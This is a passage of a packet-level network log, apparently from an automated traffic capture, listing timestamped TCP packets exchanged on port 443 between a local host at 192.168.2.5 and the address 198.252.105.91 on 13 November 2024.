Nov 13, 2024 16:28:05.646197081 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.646292925 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.646308899 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.646354914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.646989107 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.647006035 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.647039890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.647046089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.647073984 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.647092104 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.701452971 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.701472998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.701576948 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.701596022 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.701628923 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.763420105 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.763487101 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.763557911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.763586044 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.763606071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.763628960 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.805018902 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.805100918 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.805144072 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.805171013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.805214882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.805233002 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.818845987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.818867922 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.818958044 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.818977118 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.819020033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.880178928 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.880198956 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.880331039 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.880341053 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.880383015 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.935956001 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.935973883 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.936088085 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.936114073 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.936156034 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.936330080 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.936346054 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.936395884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.936399937 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.936434031 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.997072935 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.997092962 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.997210979 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:05.997222900 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:05.997262955 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.052758932 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.052795887 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.052862883 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.052889109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.052902937 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.052932024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.053647041 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.053667068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.053735971 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.053740978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.053788900 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.114073038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.114094973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.114164114 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.114181995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.114222050 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.115328074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.115344048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.115396976 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.115401983 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.115438938 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.169935942 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.169959068 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.170079947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.170098066 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.170135021 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.230699062 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.230721951 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.230845928 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.230859995 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.230899096 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.231261015 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.231277943 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.231324911 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.231329918 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.231365919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.286756992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.286834002 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.286916971 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.286943913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.286968946 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.286994934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.287436008 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.287484884 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.287512064 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.287518024 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.287545919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.287569046 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.347949028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.347979069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.348071098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.348098040 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.348135948 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.348975897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.348994970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.349050045 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.349054098 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.349090099 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.403915882 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.403978109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.404028893 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.404056072 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.404071093 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.404100895 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.465065002 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.465132952 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.465197086 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.465226889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.465260983 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.465281010 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.466187954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.466240883 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.466267109 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.466272116 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.466305017 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.466324091 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.520080090 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520113945 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520211935 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.520239115 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520281076 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.520714045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520731926 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520772934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.520781994 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.520804882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.520823002 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.581830025 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.581856012 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.581938028 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.581955910 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.581971884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.581998110 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.583024025 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.583041906 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.583082914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.583086967 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.583113909 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.583132029 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.636945963 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.636967897 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.637015104 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.637036085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.637048006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.637070894 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.637675047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.637690067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.637754917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.637758970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.637789011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.850028038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.850050926 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.850294113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.850311041 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.850337982 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.850359917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.850408077 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.850961924 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.850975990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.851032972 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.851038933 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.855171919 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.855196953 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.855241060 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.855251074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.855288029 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.856142998 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.856157064 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.856209040 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.856214046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.856237888 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.856978893 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.856998920 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.857023954 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.857028008 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.857049942 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.857774973 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.857790947 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.857825041 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.857829094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.857851982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.871646881 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.871670961 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.871733904 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.871743917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.871768951 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.891555071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.936388016 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936407089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936449051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936486006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936512947 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.936521053 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936589003 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.936959028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.936979055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.937026024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.937030077 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.987445116 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.987466097 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.987570047 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.987596989 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.988563061 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.988576889 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.988612890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:06.988619089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:06.988645077 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.035727024 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.053179026 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053200006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053272963 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.053296089 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053333044 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.053921938 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053939104 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053970098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.053973913 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.053999901 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.054017067 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.055675030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.055689096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.055747032 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.055751085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.055774927 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.055792093 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.104327917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.104346991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.104444027 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.104453087 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.104485989 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.105511904 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.105525970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.105564117 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.105567932 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.105597019 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.170056105 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170082092 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170185089 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.170212030 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170249939 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.170767069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170783997 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170818090 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.170824051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.170850992 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.170867920 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.171685934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.171706915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.171752930 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.171758890 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.171782970 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.171799898 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.221138000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.221164942 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.221204996 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.221213102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.221249104 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.221266985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.222955942 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.222981930 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.223014116 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.223016977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.223053932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.286812067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.286838055 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.286900997 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.286917925 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.286941051 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.286962986 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288256884 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288280010 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288315058 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288320065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288343906 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288362026 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288749933 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288767099 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288801908 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288805962 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.288836956 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.288853884 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.337696075 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.337721109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.337840080 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.337865114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.337912083 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.338757992 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.338777065 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.338820934 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.338824987 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.338855982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.338874102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.339598894 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.339616060 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.339665890 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.339669943 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.339719057 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.404151917 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404176950 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404301882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.404372931 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404429913 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.404653072 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404669046 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404745102 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.404750109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.404792070 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.444696903 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.444724083 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.444837093 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.444874048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.444912910 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.455298901 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.455328941 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.455398083 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.455423117 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.455455065 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.455471039 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.455986977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.456005096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.456041098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.456044912 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.456080914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.456100941 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821012020 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821038008 CET	443	49705	198.252.105.91	192.168.2.5
Nov 13, 2024 16:28:07.821110964 CET	49705	443	192.168.2.5	198.252.105.91
Nov 13, 2024 16:28:07.821137905 CET	443	49705	198.252.105.91	192.168.2.5
